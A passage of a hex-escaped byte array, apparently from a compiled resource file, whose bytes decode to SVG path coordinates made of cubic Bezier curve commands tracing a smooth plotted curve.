\x38\x20\x43\x20\x35\x2e\x30\x33\x38\x36\x31\x32\x39\x31\x37\x33\
\x20\x31\x31\x2e\x39\x34\x35\x33\x34\x33\x30\x30\x32\x36\x20\x35\
\x2e\x30\x34\x34\x38\x35\x33\x39\x38\x36\x31\x33\x20\x31\x31\x2e\
\x39\x30\x33\x33\x39\x33\x37\x31\x31\x36\x20\x35\x2e\x30\x35\x31\
\x30\x39\x35\x30\x35\x34\x39\x37\x20\x31\x31\x2e\x38\x36\x31\x35\
\x31\x38\x38\x38\x39\x31\x20\x43\x20\x35\x2e\x30\x35\x37\x33\x33\
\x36\x31\x32\x33\x38\x20\x31\x31\x2e\x38\x31\x39\x36\x34\x34\x30\
\x36\x36\x36\x20\x35\x2e\x30\x36\x33\x35\x37\x37\x31\x39\x32\x36\
\x34\x20\x31\x31\x2e\x37\x37\x37\x38\x34\x34\x31\x36\x33\x38\x20\
\x35\x2e\x30\x36\x39\x38\x31\x38\x32\x36\x31\x34\x38\x20\x31\x31\
\x2e\x37\x33\x36\x31\x35\x30\x39\x33\x39\x37\x20\x43\x20\x35\x2e\
\x30\x37\x36\x30\x35\x39\x33\x33\x30\x33\x31\x20\x31\x31\x2e\x36\
\x39\x34\x34\x35\x37\x37\x31\x35\x35\x20\x35\x2e\x30\x38\x32\x33\
\x30\x30\x33\x39\x39\x31\x35\x20\x31\x31\x2e\x36\x35\x32\x38\x37\
\x31\x38\x31\x34\x39\x20\x35\x2e\x30\x38\x38\x35\x34\x31\x34\x36\
\x37\x39\x38\x20\x31\x31\x2e\x36\x31\x31\x34\x32\x34\x36\x33\x38\
\x20\x43\x20\x35\x2e\x30\x39\x34\x37\x38\x32\x35\x33\x36\x38\x32\
\x20\x31\x31\x2e\x35\x36\x39\x39\x37\x37\x34\x36\x31\x31\x20\x35\
\x2e\x31\x30\x31\x30\x32\x33\x36\x30\x35\x36\x36\x20\x31\x31\x2e\
\x35\x32\x38\x36\x36\x39\x38\x34\x35\x36\x20\x35\x2e\x31\x30\x37\
\x32\x36\x34\x36\x37\x34\x34\x39\x20\x31\x31\x2e\x34\x38\x37\x35\
\x33\x32\x37\x38\x34\x36\x20\x43\x20\x35\x2e\x31\x31\x33\x35\x30\
\x35\x37\x34\x33\x33\x33\x20\x31\x31\x2e\x34\x34\x36\x33\x39\x35\
\x37\x32\x33\x35\x20\x35\x2e\x31\x31\x39\x37\x34\x36\x38\x31\x32\
\x31\x37\x20\x31\x31\x2e\x34\x30\x35\x34\x33\x30\x32\x34\x36\x20\
\x35\x2e\x31\x32\x35\x39\x38\x37\x38\x38\x31\x20\x31\x31\x2e\x33\
\x36\x34\x36\x36\x36\x38\x39\x30\x31\x20\x43\x20\x35\x2e\x31\x33\
\x32\x32\x32\x38\x39\x34\x39\x38\x34\x20\x31\x31\x2e\x33\x32\x33\
\x39\x30\x33\x35\x33\x34\x31\x20\x35\x2e\x31\x33\x38\x34\x37\x30\
\x30\x31\x38\x36\x37\x20\x31\x31\x2e\x32\x38\x33\x33\x34\x33\x35\
\x31\x38\x36\x20\x35\x2e\x31\x34\x34\x37\x31\x31\x30\x38\x37\x35\
\x31\x20\x31\x31\x2e\x32\x34\x33\x30\x31\x36\x38\x37\x39\x33\x20\
\x43\x20\x35\x2e\x31\x35\x30\x39\x35\x32\x31\x35\x36\x33\x35\x20\
\x31\x31\x2e\x32\x30\x32\x36\x39\x30\x32\x34\x20\x35\x2e\x31\x35\
\x37\x31\x39\x33\x32\x32\x35\x31\x38\x20\x31\x31\x2e\x31\x36\x32\
\x35\x39\x38\x33\x38\x33\x37\x20\x35\x2e\x31\x36\x33\x34\x33\x34\
\x32\x39\x34\x30\x32\x20\x31\x31\x2e\x31\x32\x32\x37\x37\x30\x37\
\x39\x37\x35\x20\x43\x20\x35\x2e\x31\x36\x39\x36\x37\x35\x33\x36\
\x32\x38\x35\x20\x31\x31\x2e\x30\x38\x32\x39\x34\x33\x32\x31\x31\
\x32\x20\x35\x2e\x31\x37\x35\x39\x31\x36\x34\x33\x31\x36\x39\x20\
\x31\x31\x2e\x30\x34\x33\x33\x38\x31\x34\x38\x37\x37\x20\x35\x2e\
\x31\x38\x32\x31\x35\x37\x35\x30\x30\x35\x33\x20\x31\x31\x2e\x30\
\x30\x34\x31\x31\x34\x35\x31\x39\x37\x20\x43\x20\x35\x2e\x31\x38\
\x38\x33\x39\x38\x35\x36\x39\x33\x36\x20\x31\x30\x2e\x39\x36\x34\
\x38\x34\x37\x35\x35\x31\x36\x20\x35\x2e\x31\x39\x34\x36\x33\x39\
\x36\x33\x38\x32\x20\x31\x30\x2e\x39\x32\x35\x38\x37\x37\x31\x31\
\x35\x20\x35\x2e\x32\x30\x30\x38\x38\x30\x37\x30\x37\x30\x33\x20\
\x31\x30\x2e\x38\x38\x37\x32\x33\x31\x34\x36\x33\x35\x20\x43\x20\
\x35\x2e\x32\x30\x37\x31\x32\x31\x37\x37\x35\x38\x37\x20\x31\x30\
\x2e\x38\x34\x38\x35\x38\x35\x38\x31\x32\x20\x35\x2e\x32\x31\x33\
\x33\x36\x32\x38\x34\x34\x37\x31\x20\x31\x30\x2e\x38\x31\x30\x32\
\x36\x36\x39\x30\x32\x33\x20\x35\x2e\x32\x31\x39\x36\x30\x33\x39\
\x31\x33\x35\x34\x20\x31\x30\x2e\x37\x37\x32\x33\x30\x32\x33\x30\
\x35\x35\x20\x43\x20\x35\x2e\x32\x32\x35\x38\x34\x34\x39\x38\x32\
\x33\x38\x20\x31\x30\x2e\x37\x33\x34\x33\x33\x37\x37\x30\x38\x36\
\x20\x35\x2e\x32\x33\x32\x30\x38\x36\x30\x35\x31\x32\x31\x20\x31\
\x30\x2e\x36\x39\x36\x37\x32\x39\x35\x35\x38\x38\x20\x35\x2e\x32\
\x33\x38\x33\x32\x37\x31\x32\x30\x30\x35\x20\x31\x30\x2e\x36\x35\
\x39\x35\x30\x34\x37\x30\x31\x39\x20\x43\x20\x35\x2e\x32\x34\x34\
\x35\x36\x38\x31\x38\x38\x38\x39\x20\x31\x30\x2e\x36\x32\x32\x32\
\x37\x39\x38\x34\x34\x39\x20\x35\x2e\x32\x35\x30\x38\x30\x39\x32\
\x35\x37\x37\x32\x20\x31\x30\x2e\x35\x38\x35\x34\x34\x30\x35\x38\
\x39\x33\x20\x35\x2e\x32\x35\x37\x30\x35\x30\x33\x32\x36\x35\x36\
\x20\x31\x30\x2e\x35\x34\x39\x30\x31\x33\x30\x31\x34\x20\x43\x20\
\x35\x2e\x32\x36\x33\x32\x39\x31\x33\x39\x35\x33\x39\x20\x31\x30\
\x2e\x35\x31\x32\x35\x38\x35\x34\x33\x38\x37\x20\x35\x2e\x32\x36\
\x39\x35\x33\x32\x34\x36\x34\x32\x33\x20\x31\x30\x2e\x34\x37\x36\
\x35\x37\x32\x30\x32\x32\x39\x20\x35\x2e\x32\x37\x35\x37\x37\x33\
\x35\x33\x33\x30\x37\x20\x31\x30\x2e\x34\x34\x30\x39\x39\x38\x30\
\x33\x38\x36\x20\x43\x20\x35\x2e\x32\x38\x32\x30\x31\x34\x36\x30\
\x31\x39\x20\x31\x30\x2e\x34\x30\x35\x34\x32\x34\x30\x35\x34\x33\
\x20\x35\x2e\x32\x38\x38\x32\x35\x35\x36\x37\x30\x37\x34\x20\x31\
\x30\x2e\x33\x37\x30\x32\x39\x32\x31\x34\x37\x36\x20\x35\x2e\x32\
\x39\x34\x34\x39\x36\x37\x33\x39\x35\x37\x20\x31\x30\x2e\x33\x33\
\x35\x36\x32\x36\x37\x34\x34\x32\x20\x43\x20\x35\x2e\x33\x30\x30\
\x37\x33\x37\x38\x30\x38\x34\x31\x20\x31\x30\x2e\x33\x30\x30\x39\
\x36\x31\x33\x34\x30\x38\x20\x35\x2e\x33\x30\x36\x39\x37\x38\x38\
\x37\x37\x32\x35\x20\x31\x30\x2e\x32\x36\x36\x37\x36\x35\x32\x34\
\x39\x36\x20\x35\x2e\x33\x31\x33\x32\x31\x39\x39\x34\x36\x30\x38\
\x20\x31\x30\x2e\x32\x33\x33\x30\x36\x32\x30\x31\x32\x35\x20\x43\
\x20\x35\x2e\x33\x31\x39\x34\x36\x31\x30\x31\x34\x39\x32\x20\x31\
\x30\x2e\x31\x39\x39\x33\x35\x38\x37\x37\x35\x34\x20\x35\x2e\x33\
\x32\x35\x37\x30\x32\x30\x38\x33\x37\x35\x20\x31\x30\x2e\x31\x36\
\x36\x31\x35\x31\x33\x35\x39\x37\x20\x35\x2e\x33\x33\x31\x39\x34\
\x33\x31\x35\x32\x35\x39\x20\x31\x30\x2e\x31\x33\x33\x34\x36\x32\
\x33\x38\x36\x39\x20\x43\x20\x35\x2e\x33\x33\x38\x31\x38\x34\x32\
\x32\x31\x34\x33\x20\x31\x30\x2e\x31\x30\x30\x37\x37\x33\x34\x31\
\x34\x32\x20\x35\x2e\x33\x34\x34\x34\x32\x35\x32\x39\x30\x32\x36\
\x20\x31\x30\x2e\x30\x36\x38\x36\x30\x36\x30\x30\x35\x36\x20\x35\
\x2e\x33\x35\x30\x36\x36\x36\x33\x35\x39\x31\x20\x31\x30\x2e\x30\
\x33\x36\x39\x38\x31\x38\x32\x37\x36\x20\x43\x20\x35\x2e\x33\x35\
\x36\x39\x30\x37\x34\x32\x37\x39\x33\x20\x31\x30\x2e\x30\x30\x35\
\x33\x35\x37\x36\x34\x39\x35\x20\x35\x2e\x33\x36\x33\x31\x34\x38\
\x34\x39\x36\x37\x37\x20\x39\x2e\x39\x37\x34\x32\x37\x39\x39\x37\
\x32\x30\x38\x20\x35\x2e\x33\x36\x39\x33\x38\x39\x35\x36\x35\x36\
\x31\x20\x39\x2e\x39\x34\x33\x37\x36\x39\x34\x37\x32\x39\x34\x20\
\x43\x20\x35\x2e\x33\x37\x35\x36\x33\x30\x36\x33\x34\x34\x34\x20\
\x39\x2e\x39\x31\x33\x32\x35\x38\x39\x37\x33\x38\x31\x20\x35\x2e\
\x33\x38\x31\x38\x37\x31\x37\x30\x33\x32\x38\x20\x39\x2e\x38\x38\
\x33\x33\x31\x39\x30\x36\x37\x31\x34\x20\x35\x2e\x33\x38\x38\x31\
\x31\x32\x37\x37\x32\x31\x32\x20\x39\x2e\x38\x35\x33\x39\x36\x39\
\x34\x30\x39\x37\x35\x20\x43\x20\x35\x2e\x33\x39\x34\x33\x35\x33\
\x38\x34\x30\x39\x35\x20\x39\x2e\x38\x32\x34\x36\x31\x39\x37\x35\
\x32\x33\x36\x20\x35\x2e\x34\x30\x30\x35\x39\x34\x39\x30\x39\x37\
\x39\x20\x39\x2e\x37\x39\x35\x38\x36\x33\x38\x39\x37\x31\x38\x20\
\x35\x2e\x34\x30\x36\x38\x33\x35\x39\x37\x38\x36\x32\x20\x39\x2e\
\x37\x36\x37\x37\x32\x30\x34\x34\x39\x39\x32\x20\x43\x20\x35\x2e\
\x34\x31\x33\x30\x37\x37\x30\x34\x37\x34\x36\x20\x39\x2e\x37\x33\
\x39\x35\x37\x37\x30\x30\x32\x36\x35\x20\x35\x2e\x34\x31\x39\x33\
\x31\x38\x31\x31\x36\x33\x20\x39\x2e\x37\x31\x32\x30\x34\x39\x36\
\x34\x39\x34\x35\x20\x35\x2e\x34\x32\x35\x35\x35\x39\x31\x38\x35\
\x31\x33\x20\x39\x2e\x36\x38\x35\x31\x35\x35\x39\x31\x36\x31\x35\
\x20\x43\x20\x35\x2e\x34\x33\x31\x38\x30\x30\x32\x35\x33\x39\x37\
\x20\x39\x2e\x36\x35\x38\x32\x36\x32\x31\x38\x32\x38\x35\x20\x35\
\x2e\x34\x33\x38\x30\x34\x31\x33\x32\x32\x38\x20\x39\x2e\x36\x33\
\x32\x30\x30\x35\x38\x38\x33\x31\x31\x20\x35\x2e\x34\x34\x34\x32\
\x38\x32\x33\x39\x31\x36\x34\x20\x39\x2e\x36\x30\x36\x34\x30\x33\
\x34\x33\x35\x38\x20\x43\x20\x35\x2e\x34\x35\x30\x35\x32\x33\x34\
\x36\x30\x34\x38\x20\x39\x2e\x35\x38\x30\x38\x30\x30\x39\x38\x38\
\x35\x20\x35\x2e\x34\x35\x36\x37\x36\x34\x35\x32\x39\x33\x31\x20\
\x39\x2e\x35\x35\x35\x38\x35\x36\x33\x32\x38\x39\x32\x20\x35\x2e\
\x34\x36\x33\x30\x30\x35\x35\x39\x38\x31\x35\x20\x39\x2e\x35\x33\
\x31\x35\x38\x34\x37\x34\x33\x36\x20\x43\x20\x35\x2e\x34\x36\x39\
\x32\x34\x36\x36\x36\x36\x39\x38\x20\x39\x2e\x35\x30\x37\x33\x31\
\x33\x31\x35\x38\x32\x39\x20\x35\x2e\x34\x37\x35\x34\x38\x37\x37\
\x33\x35\x38\x32\x20\x39\x2e\x34\x38\x33\x37\x31\x38\x36\x39\x38\
\x30\x35\x20\x35\x2e\x34\x38\x31\x37\x32\x38\x38\x30\x34\x36\x36\
\x20\x39\x2e\x34\x36\x30\x38\x31\x35\x34\x39\x33\x34\x36\x20\x43\
\x20\x35\x2e\x34\x38\x37\x39\x36\x39\x38\x37\x33\x34\x39\x20\x39\
\x2e\x34\x33\x37\x39\x31\x32\x32\x38\x38\x38\x38\x20\x35\x2e\x34\
\x39\x34\x32\x31\x30\x39\x34\x32\x33\x33\x20\x39\x2e\x34\x31\x35\
\x37\x30\x34\x35\x30\x30\x30\x35\x20\x35\x2e\x35\x30\x30\x34\x35\
\x32\x30\x31\x31\x31\x36\x20\x39\x2e\x33\x39\x34\x32\x30\x35\x30\
\x37\x39\x37\x32\x20\x43\x20\x35\x2e\x35\x30\x36\x36\x39\x33\x30\
\x38\x20\x39\x2e\x33\x37\x32\x37\x30\x35\x36\x35\x39\x34\x20\x35\
\x2e\x35\x31\x32\x39\x33\x34\x31\x34\x38\x38\x34\x20\x39\x2e\x33\
\x35\x31\x39\x31\x38\x38\x37\x30\x35\x32\x20\x35\x2e\x35\x31\x39\
\x31\x37\x35\x32\x31\x37\x36\x37\x20\x39\x2e\x33\x33\x31\x38\x35\
\x36\x34\x36\x38\x30\x33\x20\x43\x20\x35\x2e\x35\x32\x35\x34\x31\
\x36\x32\x38\x36\x35\x31\x20\x39\x2e\x33\x31\x31\x37\x39\x34\x30\
\x36\x35\x35\x33\x20\x35\x2e\x35\x33\x31\x36\x35\x37\x33\x35\x35\
\x33\x34\x20\x39\x2e\x32\x39\x32\x34\x36\x30\x34\x30\x38\x36\x20\
\x35\x2e\x35\x33\x37\x38\x39\x38\x34\x32\x34\x31\x38\x20\x39\x2e\
\x32\x37\x33\x38\x36\x36\x30\x33\x36\x31\x38\x20\x43\x20\x35\x2e\
\x35\x34\x34\x31\x33\x39\x34\x39\x33\x30\x32\x20\x39\x2e\x32\x35\
\x35\x32\x37\x31\x36\x36\x33\x37\x36\x20\x35\x2e\x35\x35\x30\x33\
\x38\x30\x35\x36\x31\x38\x35\x20\x39\x2e\x32\x33\x37\x34\x32\x31\
\x30\x32\x34\x35\x33\x20\x35\x2e\x35\x35\x36\x36\x32\x31\x36\x33\
\x30\x36\x39\x20\x39\x2e\x32\x32\x30\x33\x32\x33\x34\x32\x35\x31\
\x36\x20\x43\x20\x35\x2e\x35\x36\x32\x38\x36\x32\x36\x39\x39\x35\
\x32\x20\x39\x2e\x32\x30\x33\x32\x32\x35\x38\x32\x35\x37\x38\x20\
\x35\x2e\x35\x36\x39\x31\x30\x33\x37\x36\x38\x33\x36\x20\x39\x2e\
\x31\x38\x36\x38\x38\x35\x37\x39\x37\x35\x39\x20\x35\x2e\x35\x37\
\x35\x33\x34\x34\x38\x33\x37\x32\x20\x39\x2e\x31\x37\x31\x33\x31\
\x31\x34\x30\x30\x35\x35\x20\x43\x20\x35\x2e\x35\x38\x31\x35\x38\
\x35\x39\x30\x36\x30\x33\x20\x39\x2e\x31\x35\x35\x37\x33\x37\x30\
\x30\x33\x35\x20\x35\x2e\x35\x38\x37\x38\x32\x36\x39\x37\x34\x38\
\x37\x20\x39\x2e\x31\x34\x30\x39\x33\x32\x38\x34\x34\x35\x38\x20\
\x35\x2e\x35\x39\x34\x30\x36\x38\x30\x34\x33\x37\x20\x39\x2e\x31\
\x32\x36\x39\x30\x35\x37\x32\x34\x36\x20\x43\x20\x35\x2e\x36\x30\
\x30\x33\x30\x39\x31\x31\x32\x35\x34\x20\x39\x2e\x31\x31\x32\x38\
\x37\x38\x36\x30\x34\x36\x32\x20\x35\x2e\x36\x30\x36\x35\x35\x30\
\x31\x38\x31\x33\x38\x20\x39\x2e\x30\x39\x39\x36\x33\x33\x31\x39\
\x39\x30\x36\x20\x35\x2e\x36\x31\x32\x37\x39\x31\x32\x35\x30\x32\
\x31\x20\x39\x2e\x30\x38\x37\x31\x37\x35\x30\x33\x39\x31\x32\x20\
\x43\x20\x35\x2e\x36\x31\x39\x30\x33\x32\x33\x31\x39\x30\x35\x20\
\x39\x2e\x30\x37\x34\x37\x31\x36\x38\x37\x39\x31\x37\x20\x35\x2e\
\x36\x32\x35\x32\x37\x33\x33\x38\x37\x38\x38\x20\x39\x2e\x30\x36\
\x33\x30\x35\x30\x37\x30\x31\x35\x39\x20\x35\x2e\x36\x33\x31\x35\
\x31\x34\x34\x35\x36\x37\x32\x20\x39\x2e\x30\x35\x32\x31\x38\x30\
\x37\x35\x39\x33\x37\x20\x43\x20\x35\x2e\x36\x33\x37\x37\x35\x35\
\x35\x32\x35\x35\x36\x20\x39\x2e\x30\x34\x31\x33\x31\x30\x38\x31\
\x37\x31\x34\x20\x35\x2e\x36\x34\x33\x39\x39\x36\x35\x39\x34\x33\
\x39\x20\x39\x2e\x30\x33\x31\x32\x34\x31\x39\x30\x30\x39\x39\x20\
\x35\x2e\x36\x35\x30\x32\x33\x37\x36\x36\x33\x32\x33\x20\x39\x2e\
\x30\x32\x31\x39\x37\x36\x39\x37\x39\x31\x32\x20\x43\x20\x35\x2e\
\x36\x35\x36\x34\x37\x38\x37\x33\x32\x30\x37\x20\x39\x2e\x30\x31\
\x32\x37\x31\x32\x30\x35\x37\x32\x35\x20\x35\x2e\x36\x36\x32\x37\
\x31\x39\x38\x30\x30\x39\x20\x39\x2e\x30\x30\x34\x32\x35\x35\x39\
\x36\x36\x39\x35\x20\x35\x2e\x36\x36\x38\x39\x36\x30\x38\x36\x39\
\x37\x34\x20\x38\x2e\x39\x39\x36\x36\x31\x30\x33\x38\x37\x30\x36\
\x20\x43\x20\x35\x2e\x36\x37\x35\x32\x30\x31\x39\x33\x38\x35\x37\
\x20\x38\x2e\x39\x38\x38\x39\x36\x34\x38\x30\x37\x31\x36\x20\x35\
\x2e\x36\x38\x31\x34\x34\x33\x30\x30\x37\x34\x31\x20\x38\x2e\x39\
\x38\x32\x31\x33\x34\x36\x31\x34\x30\x34\x20\x35\x2e\x36\x38\x37\
\x36\x38\x34\x30\x37\x36\x32\x35\x20\x38\x2e\x39\x37\x36\x31\x32\
\x30\x31\x39\x34\x35\x37\x20\x43\x20\x35\x2e\x36\x39\x33\x39\x32\
\x35\x31\x34\x35\x30\x38\x20\x38\x2e\x39\x37\x30\x31\x30\x35\x37\
\x37\x35\x31\x20\x35\x2e\x37\x30\x30\x31\x36\x36\x32\x31\x33\x39\
\x32\x20\x38\x2e\x39\x36\x34\x39\x31\x32\x30\x33\x37\x32\x20\x35\
\x2e\x37\x30\x36\x34\x30\x37\x32\x38\x32\x37\x35\x20\x38\x2e\x39\
\x36\x30\x35\x33\x38\x30\x37\x35\x31\x38\x20\x43\x20\x35\x2e\x37\
\x31\x32\x36\x34\x38\x33\x35\x31\x35\x39\x20\x38\x2e\x39\x35\x36\
\x31\x36\x34\x31\x31\x33\x31\x37\x20\x35\x2e\x37\x31\x38\x38\x38\
\x39\x34\x32\x30\x34\x33\x20\x38\x2e\x39\x35\x32\x36\x31\x34\x38\
\x35\x38\x39\x20\x35\x2e\x37\x32\x35\x31\x33\x30\x34\x38\x39\x32\
\x36\x20\x38\x2e\x39\x34\x39\x38\x38\x38\x31\x31\x35\x35\x36\x20\
\x43\x20\x35\x2e\x37\x33\x31\x33\x37\x31\x35\x35\x38\x31\x20\x38\
\x2e\x39\x34\x37\x31\x36\x31\x33\x37\x32\x32\x32\x20\x35\x2e\x37\
\x33\x37\x36\x31\x32\x36\x32\x36\x39\x33\x20\x38\x2e\x39\x34\x35\
\x32\x36\x32\x30\x38\x38\x20\x35\x2e\x37\x34\x33\x38\x35\x33\x36\
\x39\x35\x37\x37\x20\x38\x2e\x39\x34\x34\x31\x38\x36\x37\x37\x38\
\x33\x20\x43\x20\x35\x2e\x37\x35\x30\x30\x39\x34\x37\x36\x34\x36\
\x31\x20\x38\x2e\x39\x34\x33\x31\x31\x31\x34\x36\x38\x36\x20\x35\
\x2e\x37\x35\x36\x33\x33\x35\x38\x33\x33\x34\x34\x20\x38\x2e\x39\
\x34\x32\x38\x36\x35\x30\x39\x30\x33\x31\x20\x35\x2e\x37\x36\x32\
\x35\x37\x36\x39\x30\x32\x32\x38\x20\x38\x2e\x39\x34\x33\x34\x34\
\x32\x38\x37\x36\x34\x35\x20\x43\x20\x35\x2e\x37\x36\x38\x38\x31\
\x37\x39\x37\x31\x31\x31\x20\x38\x2e\x39\x34\x34\x30\x32\x30\x36\
\x36\x32\x36\x20\x35\x2e\x37\x37\x35\x30\x35\x39\x30\x33\x39\x39\
\x35\x20\x38\x2e\x39\x34\x35\x34\x32\x37\x35\x37\x31\x30\x39\x20\
\x35\x2e\x37\x38\x31\x33\x30\x30\x31\x30\x38\x37\x39\x20\x38\x2e\
\x39\x34\x37\x36\x35\x37\x35\x35\x39\x39\x35\x20\x43\x20\x35\x2e\
\x37\x38\x37\x35\x34\x31\x31\x37\x37\x36\x32\x20\x38\x2e\x39\x34\
\x39\x38\x38\x37\x35\x34\x38\x38\x31\x20\x35\x2e\x37\x39\x33\x37\
\x38\x32\x32\x34\x36\x34\x36\x20\x38\x2e\x39\x35\x32\x39\x34\x35\
\x35\x36\x39\x32\x39\x20\x35\x2e\x38\x30\x30\x30\x32\x33\x33\x31\
\x35\x32\x39\x20\x38\x2e\x39\x35\x36\x38\x32\x34\x33\x31\x33\x37\
\x37\x20\x43\x20\x35\x2e\x38\x30\x36\x32\x36\x34\x33\x38\x34\x31\
\x33\x20\x38\x2e\x39\x36\x30\x37\x30\x33\x30\x35\x38\x32\x35\x20\
\x35\x2e\x38\x31\x32\x35\x30\x35\x34\x35\x32\x39\x37\x20\x38\x2e\
\x39\x36\x35\x34\x30\x37\x34\x36\x33\x36\x37\x20\x35\x2e\x38\x31\
\x38\x37\x34\x36\x35\x32\x31\x38\x20\x38\x2e\x39\x37\x30\x39\x32\
\x38\x39\x36\x38\x30\x35\x20\x43\x20\x35\x2e\x38\x32\x34\x39\x38\
\x37\x35\x39\x30\x36\x34\x20\x38\x2e\x39\x37\x36\x34\x35\x30\x34\
\x37\x32\x34\x32\x20\x35\x2e\x38\x33\x31\x32\x32\x38\x36\x35\x39\
\x34\x37\x20\x38\x2e\x39\x38\x32\x37\x39\x33\x39\x39\x30\x37\x37\
\x20\x35\x2e\x38\x33\x37\x34\x36\x39\x37\x32\x38\x33\x31\x20\x38\
\x2e\x39\x38\x39\x39\x34\x39\x37\x31\x39\x39\x36\x20\x43\x20\x35\
\x2e\x38\x34\x33\x37\x31\x30\x37\x39\x37\x31\x35\x20\x38\x2e\x39\
\x39\x37\x31\x30\x35\x34\x34\x39\x31\x35\x20\x35\x2e\x38\x34\x39\
\x39\x35\x31\x38\x36\x35\x39\x38\x20\x39\x2e\x30\x30\x35\x30\x37\
\x38\x32\x37\x34\x36\x39\x20\x35\x2e\x38\x35\x36\x31\x39\x32\x39\
\x33\x34\x38\x32\x20\x39\x2e\x30\x31\x33\x38\x35\x37\x31\x36\x37\
\x34\x35\x20\x43\x20\x35\x2e\x38\x36\x32\x34\x33\x34\x30\x30\x33\
\x36\x35\x20\x39\x2e\x30\x32\x32\x36\x33\x36\x30\x36\x30\x32\x31\
\x20\x35\x2e\x38\x36\x38\x36\x37\x35\x30\x37\x32\x34\x39\x20\x39\
\x2e\x30\x33\x32\x32\x32\x35\x38\x36\x38\x36\x32\x20\x35\x2e\x38\
\x37\x34\x39\x31\x36\x31\x34\x31\x33\x33\x20\x39\x2e\x30\x34\x32\
\x36\x31\x34\x33\x35\x34\x36\x33\x20\x43\x20\x35\x2e\x38\x38\x31\
\x31\x35\x37\x32\x31\x30\x31\x36\x20\x39\x2e\x30\x35\x33\x30\x30\
\x32\x38\x34\x30\x36\x34\x20\x35\x2e\x38\x38\x37\x33\x39\x38\x32\
\x37\x39\x20\x39\x2e\x30\x36\x34\x31\x39\x34\x38\x30\x38\x31\x20\
\x35\x2e\x38\x39\x33\x36\x33\x39\x33\x34\x37\x38\x33\x20\x39\x2e\
\x30\x37\x36\x31\x37\x36\x38\x32\x38\x39\x35\x20\x43\x20\x35\x2e\
\x38\x39\x39\x38\x38\x30\x34\x31\x36\x36\x37\x20\x39\x2e\x30\x38\
\x38\x31\x35\x38\x38\x34\x39\x38\x31\x20\x35\x2e\x39\x30\x36\x31\
\x32\x31\x34\x38\x35\x35\x31\x20\x39\x2e\x31\x30\x30\x39\x33\x35\
\x36\x37\x35\x39\x31\x20\x35\x2e\x39\x31\x32\x33\x36\x32\x35\x35\
\x34\x33\x34\x20\x39\x2e\x31\x31\x34\x34\x39\x32\x37\x30\x39\x39\
\x33\x20\x43\x20\x35\x2e\x39\x31\x38\x36\x30\x33\x36\x32\x33\x31\
\x38\x20\x39\x2e\x31\x32\x38\x30\x34\x39\x37\x34\x33\x39\x34\x20\
\x35\x2e\x39\x32\x34\x38\x34\x34\x36\x39\x32\x30\x32\x20\x39\x2e\
\x31\x34\x32\x33\x39\x31\x36\x37\x38\x34\x20\x35\x2e\x39\x33\x31\
\x30\x38\x35\x37\x36\x30\x38\x35\x20\x39\x2e\x31\x35\x37\x35\x30\
\x32\x37\x36\x39\x32\x37\x20\x43\x20\x35\x2e\x39\x33\x37\x33\x32\
\x36\x38\x32\x39\x36\x39\x20\x39\x2e\x31\x37\x32\x36\x31\x33\x38\
\x36\x30\x31\x34\x20\x35\x2e\x39\x34\x33\x35\x36\x37\x38\x39\x38\
\x35\x32\x20\x39\x2e\x31\x38\x38\x34\x39\x38\x37\x33\x33\x33\x34\
\x20\x35\x2e\x39\x34\x39\x38\x30\x38\x39\x36\x37\x33\x36\x20\x39\
\x2e\x32\x30\x35\x31\x34\x30\x35\x32\x32\x35\x31\x20\x43\x20\x35\
\x2e\x39\x35\x36\x30\x35\x30\x30\x33\x36\x32\x20\x39\x2e\x32\x32\
\x31\x37\x38\x32\x33\x31\x31\x36\x37\x20\x35\x2e\x39\x36\x32\x32\
\x39\x31\x31\x30\x35\x30\x33\x20\x39\x2e\x32\x33\x39\x31\x38\x35\
\x35\x36\x38\x39\x36\x20\x35\x2e\x39\x36\x38\x35\x33\x32\x31\x37\
\x33\x38\x37\x20\x39\x2e\x32\x35\x37\x33\x33\x32\x33\x33\x31\x37\
\x32\x20\x43\x20\x35\x2e\x39\x37\x34\x37\x37\x33\x32\x34\x32\x37\
\x20\x39\x2e\x32\x37\x35\x34\x37\x39\x30\x39\x34\x34\x38\x20\x35\
\x2e\x39\x38\x31\x30\x31\x34\x33\x31\x31\x35\x34\x20\x39\x2e\x32\
\x39\x34\x33\x37\x33\x38\x33\x34\x30\x39\x20\x35\x2e\x39\x38\x37\
\x32\x35\x35\x33\x38\x30\x33\x38\x20\x39\x2e\x33\x31\x33\x39\x39\
\x37\x35\x31\x39\x33\x38\x20\x43\x20\x35\x2e\x39\x39\x33\x34\x39\
\x36\x34\x34\x39\x32\x31\x20\x39\x2e\x33\x33\x33\x36\x32\x31\x32\
\x30\x34\x36\x36\x20\x35\x2e\x39\x39\x39\x37\x33\x37\x35\x31\x38\
\x30\x35\x20\x39\x2e\x33\x35\x33\x39\x37\x38\x32\x31\x39\x33\x31\
\x20\x36\x2e\x30\x30\x35\x39\x37\x38\x35\x38\x36\x38\x38\x20\x39\
\x2e\x33\x37\x35\x30\x34\x38\x34\x39\x33\x30\x35\x20\x43\x20\x36\
\x2e\x30\x31\x32\x32\x31\x39\x36\x35\x35\x37\x32\x20\x39\x2e\x33\
\x39\x36\x31\x31\x38\x37\x36\x36\x37\x39\x20\x36\x2e\x30\x31\x38\
\x34\x36\x30\x37\x32\x34\x35\x36\x20\x39\x2e\x34\x31\x37\x39\x30\
\x36\x35\x38\x38\x38\x32\x20\x36\x2e\x30\x32\x34\x37\x30\x31\x37\
\x39\x33\x33\x39\x20\x39\x2e\x34\x34\x30\x33\x39\x30\x38\x38\x30\
\x38\x31\x20\x43\x20\x36\x2e\x30\x33\x30\x39\x34\x32\x38\x36\x32\
\x32\x33\x20\x39\x2e\x34\x36\x32\x38\x37\x35\x31\x37\x32\x38\x20\
\x36\x2e\x30\x33\x37\x31\x38\x33\x39\x33\x31\x30\x36\x20\x39\x2e\
\x34\x38\x36\x30\x36\x30\x31\x32\x32\x38\x35\x20\x36\x2e\x30\x34\
\x33\x34\x32\x34\x39\x39\x39\x39\x20\x39\x2e\x35\x30\x39\x39\x32\
\x33\x36\x37\x37\x31\x31\x20\x43\x20\x36\x2e\x30\x34\x39\x36\x36\
\x36\x30\x36\x38\x37\x34\x20\x39\x2e\x35\x33\x33\x37\x38\x37\x32\
\x33\x31\x33\x38\x20\x36\x2e\x30\x35\x35\x39\x30\x37\x31\x33\x37\
\x35\x37\x20\x39\x2e\x35\x35\x38\x33\x33\x33\x34\x37\x30\x34\x20\
\x36\x2e\x30\x36\x32\x31\x34\x38\x32\x30\x36\x34\x31\x20\x39\x2e\
\x35\x38\x33\x35\x33\x39\x33\x39\x38\x39\x32\x20\x43\x20\x36\x2e\
